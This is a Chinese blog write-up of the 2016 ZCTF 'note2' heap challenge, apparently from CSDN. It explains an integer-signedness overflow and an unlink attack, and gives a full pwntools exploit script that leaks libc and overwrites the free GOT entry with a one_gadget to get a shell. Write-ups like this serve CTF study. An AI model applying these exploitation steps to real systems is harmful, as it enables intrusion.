2016 ZCTF note2 题解

最新推荐文章于 2022-08-13 22:04:25 发布
最新推荐文章于 2022-08-13 22:04:25 发布
阅读量816 收藏
点赞数 1
分类专栏: 堆溢出题目 文章标签: unlink ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38419913/article/details/103333195
版权

程序分析

先查看程序开启的保护,可以看到没有开启PIE。并且也是一个经典的菜单程序。
在这里插入图片描述

new note函数

在这里插入图片描述
可以看到,我们一共能申请四个堆块,堆块的指针,数量都存储在bss端上。我们能申请超过0x80的堆块,并在其中写入内容,这里的大小被限制了。但是我们进入my_read函数后就能发现for循环的条件中,size为int类型,而i是unsigned int类型。我们都知道,在c语言中,无符号变量和有符号变量比较时,会将有符号变量转化为无符号变量来比较。所以这里size为0的时候。(unsigned int)(size-1)就就是非常大的整数,所以for循环永远成立,这里的输入长度限制就被突破了。
在这里插入图片描述

show note

输入index,如果index值大小合法并且,对应的指针不为空,就打印出对应的内容。
在这里插入图片描述

edit note

重新编辑note中的内容,但是不能超过之前规定的size限制。

delete note

free note的堆块,并且把指向堆块的指针置空并且把size也置为0。

利用思路

由于申请的堆块数量有严格的限制(4块),并且堆块的指针放在bss段上,能知道指针的地址,所以考虑用unlink。

先设计好理想的unlink时堆块的状态,其中要free的是chunk2,在进行后向合并时,对fake chunk P进行unlink。最后的结果是让ptr0指向&ptr0-0x18。
在这里插入图片描述
为了完成如上图的堆块结构。chunk0内的fake chunk可以在一开始调用new note的时候就直接完成。chunk2的pre_size和size字段则需要chunk1溢出来完成。
具体的就是申请完chunk0,chunk1,chunk2之后,free掉chunk1,使之进入fastbin中,再申请回来。由于new note的任意长度写的漏洞,使得溢出chunk1从而修改chunk2的头部成为可能。

ptr_0 = 0x602120
fake_fd = ptr_0 - 0x18
fake_bk = ptr_0 - 0x10
note0_content = "\x00" * 8 + p64(0xa1) + p64(fake_fd) + p64(fake_bk)
new_note(0x80, note0_content) #note0
new_note(0x0, "aa") #note1
new_note(0x80, "bb") #note2

delete_note(1)
note1_content = "\x00" * 16 + p64(0xa0) + p64(0x90)
new_note(0x0, note1_content)

delete_note(2) #unlink

unlink完成之后,就可以容易的进行libc地址的泄漏和get shell。

# 泄漏libc
free_got = e.got["free"]
payload = 0x18 * "a" + p64(free_got)
edit_note(0, 1, payload)

show_note(0)
io.recvuntil("is ")

free_addr = u64(io.recv(6).ljust(8, "\x00"))
libc_addr = free_addr - libc.symbols["free"]
print("libc address: " + hex(libc_addr))

#get shell
system_addr = libc_addr + libc.symbols["system"]
one_gadget = libc_addr + 0xf02a4
edit_note(0, 1, p64(one_gadget)) #overwrite free got -> system address

完整的exp

#coding=utf-8
from pwn import *
import binascii

DEBUG = 0
io = process("./pwn")
e = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
if DEBUG == 1:
    context.log_level = "debug"
    context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

def new_note(size, content):
    io.recvuntil(">>")
    io.sendline("1")
    io.recvuntil(")")
    io.sendline(str(size))
    io.recvuntil(":")
    io.sendline(content)

def show_note(index):
    io.recvuntil(">>")
    io.sendline("2")
    io.recvuntil(":")
    io.sendline(str(index))

def edit_note(index, choice, content):
    io.recvuntil(">>")
    io.sendline("3")
    io.recvuntil(":")
    io.sendline(str(index))
    io.recvuntil("]")
    io.sendline(str(choice))
    io.recvuntil(":")
    io.sendline(content)

def delete_note(index):
    io.recvuntil(">>")
    io.sendline("4")
    io.recvuntil(":")
    io.sendline(str(index))

io.recvuntil(":")
io.sendline("/bin/sh") #name
io.recvuntil(":")
io.sendline("ddd")

ptr_0 = 0x602120
fake_fd = ptr_0 - 0x18
fake_bk = ptr_0 - 0x10
note0_content = "\x00" * 8 + p64(0xa1) + p64(fake_fd) + p64(fake_bk)
new_note(0x80, note0_content) #note0
new_note(0x0, "aa") #note1
new_note(0x80, "bb") #note2

delete_note(1)
note1_content = "\x00" * 16 + p64(0xa0) + p64(0x90)
new_note(0x0, note1_content)

delete_note(2) #unlink

# 泄漏libc
free_got = e.got["free"]
payload = 0x18 * "a" + p64(free_got)
edit_note(0, 1, payload)

show_note(0)
io.recvuntil("is ")

free_addr = u64(io.recv(6).ljust(8, "\x00"))
libc_addr = free_addr - libc.symbols["free"]
print("libc address: " + hex(libc_addr))

#get shell
system_addr = libc_addr + libc.symbols["system"]
one_gadget = libc_addr + 0xf02a4
edit_note(0, 1, p64(one_gadget)) #overwrite free got -> system address

io.interactive()
coco##
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
zctf2016_note2【write up】
最新发布
m0_73756460的博客
04-09 48
BUU刷题zctf2016_note2【write up】
[BUUCTF]PWN——zctf2016_note2(unlink
mcmuyanga的博客
02-07 726
zctf2016_note2 附件 步骤 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,经典的题的菜单 64位ida载入,方便看程序,我修改了函数名 New_note() 定义的时候i是unsigned_int64,但是for循环里的i是int64.我们都知道,在c语言中,无符号变量和有符号变量比较时,会将有符号变量转化为无符号变量来比较。所以这里size为0的时候。(unsigned int)(size-1)就就是非常大的整数,存在整数溢出漏洞 show_not
2016 ZCTF note2
Morphy_Amo的博客
01-27 2587
溢出中unlink的应用
ctf note
zhn的博客
05-06 771
引言 密码学(Cryptography)一般可分为古典密码学和现代密码学。 其中,古典密码学,作为一种实用性艺术存在,其编码和破译通常依赖于设计者和敌手的创造力与技巧,并没有对密码学原件进行清晰的定义。古典密码学主要包含以下几个方面: 单表替换加密(Monoalphabetic Cipher) 多表替换加密(Polyalphabetic Cipher) 奇奇怪怪的加密方式 而现代密码学则起源于 20 世纪中后期出现的大量相关理论,1949 年香农(C. E. Shannon)发表了题为《保密系统.
[BUUCTF]zctf2016_note2
zyxx_wjc的博客
08-13 1101
BUUCTF刷题wp分享:zctf2016_note2
2016 ZCTF——note2
04-20 343
64位程序,没开PIE  #unlink 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stderr, 0LL, 2...
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 573
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
Unlink——2016 ZCTF note2解析
weixin_30256505的博客
12-14 191
简介 Unlink是经典的漏洞,刚看到这个漏洞不知道如何实现任意代码执行,所以找了一个CTF题,发现还有一些细节的地方没有讲的很清楚,题目在这里。自己也动手写一遍,体验一下 题目描述 首先,我们先分析一下程序,在checksec中检查文件,发现是64位程序,然后放入IDA中,f5,,得出主程序是这样: void __fastcall main(__int64 a1, c...
[Buuoj]zctf2016_note2
zylxixixi的博客
11-10 309
思路一: 利用house系列的中的house of force,将goodbye_message的地址覆盖为magic的地址,从而输出flag地址 思路二 利用unlink漏洞,泄libc基址并且将atoi的got表项修改为system的地址,最后输入/bin/sh
zctf2016_note2
z1r0的博客
02-02 562
zctf2016_note2 查看保护 这是一个漏洞点。在edit的时候 ,选择append时就会产生越界,如果size开始为0,则v1[v6 - strlen(&dest) + 14] <= 14了,所以在执行strncat时可以无限附加覆盖下一个块。所以可以申请fastbin,因为可以覆盖后面的块,在name中伪装假的块,然后对其进行释放这样再申请时就会得到其地址,从而改写指针 简单理解的话就是size为0的chunk可以无限追加数据。然后追加到最后可以修改heap_ptr那里的
unlink 2016 zctf note2
qq_36918532的博客
01-18 129
题目可在buuctf下载 这章还是unlink的复习 拖到IDA里面可以看到,开头让输入名字,地址(其实没卵用) 然后看下面的菜单分别是新增,打印,编辑,释放 在新增功能中size是无符号数,所以当size为0的时候,0-1之后为无穷大的数,也就是能向中写入无穷大的数0xffff…,根据glibc规定会分配0X20个字节,但是读取的时候不受限制,会产生溢出 并且最多四个块 同时我们可以看出ptr是存放content的地址(0x602120),id存放在0x602160,size存放在0x602140
【unlinkzctf2016_note2
huzai9527的博客
04-19 221
【unlinkzctf2016_note2 1.ida分析 溢出,unsigned int用于判断条件,导致的溢出 指针数组 2.思路 创建3个chunk,chunk0、chunk1、chunk2,通过chunk1连接chunk0,chunk2。构造unlink 在chunk0,构造fake chunk,free(chunk1)然后再申请修改chunk2的size,add(0,'b'*0x10 + p64(0xa0)+p64(0x90)) 释放chunk2,unlin
zctf_2016_note2
xieyichensss的博客
07-03 143
这是一道unlink的题,非常经典。 unlink是什么,顾名思义,就是把其中一个chunk块给free掉。会将块的地址变成存放块地址的地址附近。 看图 需要绕过的检查: 1.后一个快的prev_size为要为unlink块的大小。并且pre_inuse要为0,只有这样,prev_size才有效。 2.需要构造fake_fd,fake_bk。 (这里不考虑large_bin的检测) fd_nextsize和bk_nextsize 思路 1.首先一定要泄libc基址,这样才能向下进行攻击。那么,如
zctf_2016_note3
seaaseesa的博客
04-17 762
zctf_2016_note3 首先检查一下程序的保护机制 然后用IDA分析一下,edit里存在一个整数溢出导致溢出的漏洞。当输入为0x8000000000000000时,即可使得index为-1,由于输入的长度不够,因此将0x8000000000000000转为负数的形式输入进去即可。然后就是正常的unlink了。 #coding:utf8 from pwn import * ...
zctf_2016_note3 详解
One_p_Two_w的博客
11-04 504
zctf_2016_note3 详解 题目可以在buu上找到,ibc版本为2.23 和wiki做的不一样,wiki那个我还没看懂,改天再研究研究orz 查看保护机制 题目分析 是个菜单题,提供了新建note、打印note、编辑note、删除note四个功能 添加note ​ 最多添加七个note,每个note大小在0-0x400之间,申请到的空间地址会放在ptr指针处 漏洞在edit功能模块 ​ 当a2 = 0时,由于i为unsigned_int,-1相当于无穷大,会造成无限制读入,令我们可以覆盖后面
CISCN PWN签到题 task_note_service
Bill
05-02 1616
序言 比赛中这道差那么一点点就做出来了 程序运行 1.menu ---------menu--------- 1. add note 2. show note 3. edit note 4. del note 5. exit your choice&gt;&gt; 2. add 1. add note 2. show note 3. edit note 4. del...
CTF-PWN-heap (off-by-one+unlink+malloc_hook利用)
SuperGate的博客
12-02 787
程序综述 [*] '/home/supergate/Desktop/Pwn/pwn1' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开。 IDA查看后发现是一个菜单题,主...
CTF notebook
zero
08-11 839
Debug=0 Local=1 Frida=0 Debug_pwntools=1 #常量 Local_path='./notebook' Remote_addr='' Port=1 frida_script_path='./frida.js' ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值